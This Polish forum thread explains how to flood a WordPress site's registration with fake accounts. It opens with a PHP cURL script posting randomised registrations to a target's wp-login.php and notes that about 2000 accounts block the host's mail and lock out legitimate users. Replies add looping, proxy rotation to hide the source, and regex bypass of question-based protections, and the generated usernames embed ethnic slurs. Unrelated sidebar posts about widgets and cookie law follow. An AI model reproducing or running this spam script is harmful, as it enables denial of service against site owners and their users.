Skocz do zawartości

Jak zaspamować rejestrację userów w wordpress?


 Udostępnij

Rekomendowane odpowiedzi

Witam dziś przedstawię wam prosty crul który ma za zadanie rejestrować userów na wp ile razy naciśniemy f5 tyle userów zaspamuje komuś bazę
 

$adres = 'http://strona.pl/wp-login.php?action=register';
 $cookiefile = tempnam("/tmp", "cookies");
 $c = curl_init();
 curl_setopt($c, CURLOPT_URL, $adres);
 curl_setopt($c, CURLOPT_POST, 1);//przesylamy metodą post
 curl_setopt($c, CURLOPT_POSTFIELDS, 'user_login='.rand(2,33).'tyle_czarnych'.rand(5,87).'6&user_email='.rand(16,900).'Ruskie'.rand(6,200).'@wp.pl&submit=wp-sumbit'); //dane do wyslania
curl_setopt($c, CURLOPT_COOKIEJAR,  $cookiefile);
$page2 = curl_exec($c);
 curl_close($c);

jeżeli email się powieli z istniejącym już w bazie strona zwróci komunikat z wp wraz z loginem i emailem miłej zabawy
/// na proserwer skutkuje to tym że gdy zarejestrujemy 2000 kont to wysyłanie email ze strony zostaje zablokowane i w taki to sposób każdy nowy user tego dnia nie ma możliwości rejestracji

Odnośnik do komentarza
Udostępnij na innych stronach

Nie powinieneś udostępniać takich rzeczy

Każdy kto tego potrzebuje z pewnością sam by sobie napisał

Osobiści napisał bym to w pythonie z request,

oraz wsadził w pętlę,

dzięki temu mógł bym póżniej rozszerzyć możliowść spam bota o komentowanie,

po za tym w łatwy sposób bym mógł ukryć jego działanie dodając liste proxy i losując jedno przy każdej rejestracji

edit:

@SeNioR takie zabezpieczenie jest banalne do ominiecja,

wystarczy mały regex aby wyciąć pytanie,

baza pytań to już mały problem do zrobienia

lepiej zabezpieczyć stronę googlowskim noCaptcha

Edytowane przez plx211
Odnośnik do komentarza
Udostępnij na innych stronach

Godzinę temu, rogue napisał:

A co jeśli rejestracja jest wyłączona na stronie wp? 

to nie spamujemy w temacie

Godzinę temu, plx211 napisał:

Nie powinieneś udostępniać takich rzeczy

Każdy kto tego potrzebuje z pewnością sam by sobie napisał

Osobiści napisał bym to w pythonie z request,

oraz wsadził w pętlę,

dzięki temu mógł bym póżniej rozszerzyć możliowść spam bota o komentowanie,

po za tym w łatwy sposób bym mógł ukryć jego działanie dodając liste proxy i losując jedno przy każdej rejestracji

 

edit:

@SeNioR takie zabezpieczenie jest banalne do ominiecja,

wystarczy mały regex aby wyciąć pytanie,

baza pytań to już mały problem do zrobienia

lepiej zabezpieczyć stronę googlowskim noCaptcha

 


nie jest w pętli bo jakiś początkujący osobnik mógł by non stop spamować funkcja mam na celu pokazanie jako można się rejestrować za pomocą php dla początkujących

 

Godzinę temu, SeNioR napisał:

@włochen Licząc na to że przy rejestracji podaje się tylko nazwę użytkownika i email... wystarczy jakieś banalne zabezpieczenie tekstowe (losowe) i już nie będzie działać  

 

to tak samo jak bot do przemo kiedyś nie działał gdzie wprowadzili sid do postu tak samo tutaj można by było przechwycić tą wartość

Odnośnik do komentarza
Udostępnij na innych stronach

52 minuty temu, włochen napisał:

to tak samo jak bot do przemo kiedyś nie działał gdzie wprowadzili sid do postu tak samo tutaj można by było przechwycić tą wartość

Przerobienie bota do spamowani pod ten "sid" to 3 minuty.

Odnośnik do komentarza
Udostępnij na innych stronach

Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
 Udostępnij

  • Podobna zawartość

    • Witam, mam problem. Wczoraj późnym wieczorem aktywowałem Search Console i Google Analytics, lecz do teraz nie wyświetla mi statystyk strony. Kod, który miałem dodać z GA dodałem przed </head>. Pierwszy raz używam tych dodatków i nie mam pojęcia jak to włączyć (tzn. włączyć chyba włączyłem, ale nie działa).
      URL: pawlikowska.edu.pl
    • Witam! Tak jak w tytule potrzebuje plugin WordPress, a dokładnie zmiana języka na stronie. Chce po prostu mieć takie coś w menu, że jak klikne np angielski to sie zmieni na polski. 
    • Witam. Nie można zapisać artykułu w WordPress przez przycisk "Aktualizuj". Błąd serwera (400 Bad Request).
      Posiadam wtyczke Elementor:, gdy klikam aktualizuj pojawia sie error: Error widoczny na zdjeciu, z gory dziekuje za pomoc. 

    • Cześć. Publikuję kod kolejnego prostego widgeta do Invision Community tym razem to "Top 5 dostawców hostingowych". Poprzedni widget to blok Polecane szablony MyBB.  

      Kliknij aby powiększyć.
       Widget w pierwotnym założeniu miał automatycznie pobierać dane o liczbie domen z API (top100.rootnode.pl). ale technicznie na tamten czas mnie to przerosło  Kod pisany pod IPS 4.4.
      Można go przerobić na cokolwiek np. TOP 5 użytkowników. Możecie dodać sobie dwie frazy tak jak ja to zrobiłem "tophosting_head" i "tophosting_domains" z wykorzystaniem Plural albo wpisać bezpośrednio tekst.
      Aby dodać widget do bocznego panelu, możecie użyć wtyczki TXT & PHP Widget lub jeżeli ktoś posiada aplikację "Pages" to wystarczy dodać nowy blok i w polu "Zawartość" wkleić kod. 
      <div class="ipsWidget ipsWidget_vertical ipsWidget_repairSpace"> <h3 class="ipsWidget_title ipsType_reset">{lang="tophosting_head"}</h3> <div class="ipsPad_half ipsWidget_inner"> <ul class="ipsDataList ipsDataList_reducedSpacing"> <li class="ipsDataItem"> <div class="ipsDataItem_icon ipsPos_middle ipsType_center ipsType_large ipsType_light"><strong>1</strong></div> <div class="ipsDataItem_main"> <div class="ipsType_break ipsContained">nazwa.pl</div> <p class="ipsType_reset ipsType_medium ipsType_blendLinks ipsContained"> <span class="ipsType_light">+{lang="tophosting_domains" pluralize="602000"}</span> </p> </div> </li> <li class="ipsDataItem"> <div class="ipsDataItem_icon ipsPos_middle ipsType_center ipsType_large ipsType_light"><strong>2</strong></div> <div class="ipsDataItem_main"> <div class="ipsType_break ipsContained">home.pl</div> <p class="ipsType_reset ipsType_medium ipsType_blendLinks ipsContained"> <span class="ipsType_light">+{lang="tophosting_domains" pluralize="403000"}</span> </p> </div> </li> <li class="ipsDataItem"> <div class="ipsDataItem_icon ipsPos_middle ipsType_center ipsType_large ipsType_light"><strong>3</strong></div> <div class="ipsDataItem_main"> <div class="ipsType_break ipsContained">linuxpl.com</div> <p class="ipsType_reset ipsType_medium ipsType_blendLinks ipsContained"> <span class="ipsType_light">+{lang="tophosting_domains" pluralize="100000"}</span> </p> </div> </li> <li class="ipsDataItem"> <div class="ipsDataItem_icon ipsPos_middle ipsType_center ipsType_large ipsType_light"><strong>4</strong></div> <div class="ipsDataItem_main"> <div class="ipsType_break ipsContained">ovh.pl</div> <p class="ipsType_reset ipsType_medium ipsType_blendLinks ipsContained"> <span class="ipsType_light">+{lang="tophosting_domains" pluralize="90000"}</span> </p> </div> </li> <li class="ipsDataItem"> <div class="ipsDataItem_icon ipsPos_middle ipsType_center ipsType_large ipsType_light"><strong>5</strong></div> <div class="ipsDataItem_main"> <div class="ipsType_break ipsContained">hekko.pl</div> <p class="ipsType_reset ipsType_medium ipsType_blendLinks ipsContained"> <span class="ipsType_light">+{lang="tophosting_domains" pluralize="60000"}</span> </p> </div> </li> </ul> </div> </div>
    • Witam, chciałbym was prosić o pomoc w znalezieniu podobnego motywu na wordpress. Ważne żeby było takie same menu. 
      Krakowska 37
      Pozdrawiam
  • Najnowsze tematy

  • Ostatnio rozwiązane

    • Cześć. Sprawdź poniższe tematy z tabelką "Kontakt z Administracją":  Tabela "Kontakt z Administracją" dla stylu MyBB Trzeci kod na tabelkę "Kontakt z Administracją" pod MyBB Gotowy kod na "Kontakt z Administracją". Kontakt z Administracją + status Online - Offline [MyBB] Kontakt z Administracją w panelu bocznym A tutaj tabelka serwerów Counter Strike: Gotowa Tabela Serwerów CS pod MyBB Te wszystkie gotowce są przeważnie wyciągane z różnych styli i nie zawsze je tak łatwo dodać do innego. Trzeba zazwyczaj poprawić lekko kod pod swój motyw.
    • Cześć. Tak strona internetowa musi mieć informację iż wykorzystuje pliki cookies, najczęściej jest to wyskakujący baner na dole strony z przyciskiem "Zgadzam się". Oczywiście jeżeli Twoja strona nie wykorzystuje cookies to nie musisz umieszczać żadnego ostrzeżenia. Dodatkowo nie każdy rodzaj ciasteczek wymaga publikacji na stronie o ich wykorzystywaniu.  Ustawa wyłącza spod tego obowiązku ciasteczka o charakterze technicznym, czyli wykorzystywane między innymi przy rejestracji kont, logowaniu albo zapisywaniu towarów w koszyku sklepu internetowego. W Polsce przepis dotyczący stosowania plików cookies został umieszczony 22 marca 2013 roku w ustawie Prawo Telekomunikacyjne w art. 173 i brzmi on tak: Przechowywanie informacji lub uzyskiwanie dostępu do informacji już przechowywanej w telekomunikacyjnym urządzeniu końcowym abonenta lub użytkownika końcowego jest dozwolone, pod warunkiem że: abonent lub użytkownik końcowy zostanie uprzednio bezpośrednio poinformowany w sposób jednoznaczny, łatwy i zrozumiały, o:  celu przechowywania i uzyskiwania dostępu do tej informacji, możliwości określenia przez niego warunków przechowywania lub uzyskiwania dostępu do tej informacji za pomocą ustawień oprogramowania zainstalowanego w wykorzystywanym przez niego telekomunikacyjnym urządzeniu końcowym lub konfiguracji usługi; abonent lub użytkownik końcowy, po otrzymaniu informacji, o których mowa w pkt 1, wyrazi na to zgodę; (…) przechowywana informacja lub uzyskiwanie do niej dostępu nie powoduje zmian konfiguracyjnych w telekomunikacyjnym urządzeniu końcowym abonenta lub użytkownika końcowego i oprogramowaniu zainstalowanym w tym urządzeniu. Jest taki zapis w ustawie, ale dotyczy on bardziej dużych korporacji czy technologicznych gigantów jak Google czy Amazon.  Zgodnie z przepisami karnymi Prawa Telekomunikacyjnego (art. 209 ust. 1, pkt. 27 i art. 210) za brak informacji o ciasteczkach karę  pieniężną w drodze decyzji nakłada Prezes Urzędu Komunikacji Elektronicznej. Uwzględniając okoliczności i możliwości finansowe ukaranego podmiotu może nałożyć karę w wysokości do 3 % przychodu ukaranego podmiotu, osiągniętego w poprzednim roku kalendarzowym.  Jeżeli okres działania podmiotu jest krótszy niż rok kalendarzowy, za podstawę wymiaru kary przyjmuje się kwotę 500 000 złotych! Najłatwiej i najszybciej skorzystać z gotowych skryptów Javascript i zaimplementować je na swojej stronie.  Skorzystaj ze strony: Skrypt-cookies.pl albo ciasteczka.eu.
    • Musisz dodać kod HTML legendy grup w osobnej tabeli, bo dodałeś kod wewnątrz tabeli "WhosOnline" dlatego się rozjechało. Znaki zapytania wyświetlają się dlatego że w stylu masz zaimplementowaną nowszą wersję Font Awesome 5 a w kodzie legendy grup jest kod dla wersji 4.7. Przykładowo ten kod dla ikonki pół-gwiazdy nie zadziała na FA5 a zamiast ikonki będzie pokazywał się znak zapytania o którym wspomniałeś. <i class="fa fa-star-half-o" aria-hidden="true"></i> Poprawnym odpowiednikiem tej ikonki w nowej wersji jest: <i class="fas fa-star-half"></i> Jak widać w FA5 jest "fas" zamiast "fa" i zniknęło -o na końcu. Natomiast dla ikonek z logiem marek np. Steam czy Facebook zamist "fas" jest "fab" = Font Awesome Brand. Warto dodać że w FA5 wiele ikonek jest dostępnych tylko w wersji PRO więc nie zawsze znajdziesz dokładny odpowiednik, trzeba użyć najbardziej zbliżonej dostępnej ikonki. Myślę że wiesz już o co chodzi, bo są to naprawdę podstawy HTML.  Dobra, poprawiłem cały kod za Ciebie. Warto zadbać o to aby kod był czytelny czyli np. oddzielić sobie poszczególne komórki (td) wtedy łatwiej jest go zrozumieć i edytować. Dodatkowo nie widzę sensu dodawać stylu lokalnego (CSS) wewnątrz kodu HTML, przecież od tego jest właśnie arkusz styli, aby tam dodwać klasy i w razie czego edytować jedną klasę a nie tracić czasu na edycję kodu HTML. Przykładowo jeżeli chciałbyś teraz zmienić "padding-left" to musisz edytować to w każdym elemencie "span" a wystarczyłoby dodać nową klasę do global.css i operować tylko nią... ale mniejsza o to nie będę się czepiał 😛  Przejdź do szablonu index_boardstats, usuń cały dotychczasowy kod i wklej: {$forumstats} <table border="0" cellspacing="{$theme['borderwidth']}" cellpadding="{$theme['tablespace']}" class="tborder"> <thead> <tr> <td class="thead{$collapsedthead['boardstats']}"> <div><strong><span class="podkresleniestaty">{$lang->whos_online} </span><span class="podnapisstaty"> {$lang->online_note} </span></strong></div> </td> </tr> </thead> <tbody style="{$collapsed['boardstats_e']}" id="boardstats_e"> {$whosonline} </tbody> </table> <br /> <table border="0" cellspacing="{$theme['borderwidth']}" cellpadding="{$theme['tablespace']}" class="tborder"> <td class="trow1" style="vertical-align:top;height:20%;margin:0 auto;width:13.5%;"> <span style="font-size:13px; color: red; text-shadow: 3px 3px 10px !important;font-weight:bold;">Administracyjne:</span><br> <br> <span class="rank_admin"><i class="fa fa-star"></i> Właściciel</span> <br> <span class="rank_viceadmin" style="padding-left: 10px;"><i class="fas fa-star"></i> Współwłaściciel</span> <br> <span class="rank_hadmin" style="padding-left: 10px;"><i class="fas fa-star" aria-hidden="true"></i> Administrator Forum</span> <br> <span class="rank_opforum" style="padding-left: 10px;"><i class="fas fa-star-half"></i> Opiekun Forum</span> <br> <span class="rank_mod" style="padding-left: 10px;"><i class="fas fa-cogs" aria-hidden="true"></i> Moderator</span><br> <span class="rank_ubt" style="padding-left: 10px;"><i class="fas fa-gavel"></i> UBTeam</span> <br> </td> <td class="trow1" style="vertical-align:top;height:20%;margin:0 auto;width:13.5%;"> <span style="font-size:13px; color: green; text-shadow: 3px 3px 10px !important;font-weight:bold;">Serwerowe:</span> <br><br> <span class="rank_wserwera" style="padding-left: 10px;"><i class="fas fa-shield-alt"></i> Właściciel Serwera</span> <br> <span class="rank_opiekun" style="padding-left: 10px;"><i class="fab fa-yelp"></i> Opiekun Serwera</span> <br> <span class="rank_madmin" style="padding-left: 10px;"><i class="fab fa-steam"></i> Multi-Admin</span><br> <span class="rank_aserwera" style="padding-left: 10px;"><i class="fab fa-steam"></i> Admin Serwera CS 1.6</span> <br> <span class="rank_ats" style="padding-left: 10px;"><i class="fas fa-microphone"></i> Admin Serwera TS3</span><br> <span style="font-weight: bold; color: #00ffff;"><i class="fab fa-steam" aria-hidden="true"></i>&nbsp;Admin Rezerwowy</span><br> <span style="text-shadow: 1px 1px 8px #FFCC00 ; font-weight: bold; color:#FFCC00 ;"><i class="fas fa-code" aria-hidden="true"></i>Technik Serwerów</span><br> <span style="text-shadow: 1px 1px 8px #FFCC00 ; font-weight: bold; color:#FFCC00 ;"><i class="fas fa-microphone"></i>Technik TeamSpeak</span> </td> <td class="trow1" style="vertical-align:top;height:20%;margin:0 auto;width:13.5%;"> <span style="font-size:13px; color: cyan; text-shadow: 3px 3px 10px !important;font-weight:bold;">Forumowe:</span> <br><br> <span class="rank_grafik" style="padding-left: 10px;"><i class="fas fa-paint-brush"></i> Grafik</span> <br> <span class="rank_redaktor" style="padding-left: 10px;"><i class="fas fa-edit"></i> Redaktor</span><br> <span class="rank_rfb" style="padding-left: 10px;"><i class="fab fa-facebook" aria-hidden="true"></i> Redaktor FanPage</span> </td> <td class="trow1" style="vertical-align:top;height:20%;margin:0 auto;width:13.5%;"> <span style="font-size:13px;color: purple; text-shadow: 3px 3px 10px !important;font-weight:bold;">Premium:</span> <br><br> <span class="rank_donator" style="padding-left: 10px;"><i class="fas fa-dollar-sign"></i> Donator</span><br> <span class="rank_premium" style="padding-left: 10px;"><i class="fas fa-star"></i> Premium</span><br> <span class="rank_weteran" style="padding-left: 10px;"><i class="fas fa-gem"></i> Zasłużony</span> </td> <td class="trow1" style="vertical-align:top;height:20%;margin:0 auto;width:13.5%;"> <span style="font-size:13px; color: white;text-shadow: 3px 3px 10px !important;font-weight:bold;">Podstawowe:</span> <br><br> <span class="rank_laska" style="padding-left: 10px;"><i class="fas fa-heart"></i> Kobieta</span> <br> <span class="rank_bywalec" style="padding-left: 10px;"><i class="fas fa-gem"></i> Bywalec</span><br> <span class="rank_user" style="padding-left: 10px;"><i class="fas fa-user"></i> Użytkownik</span> <br> </td> </table> <br />
×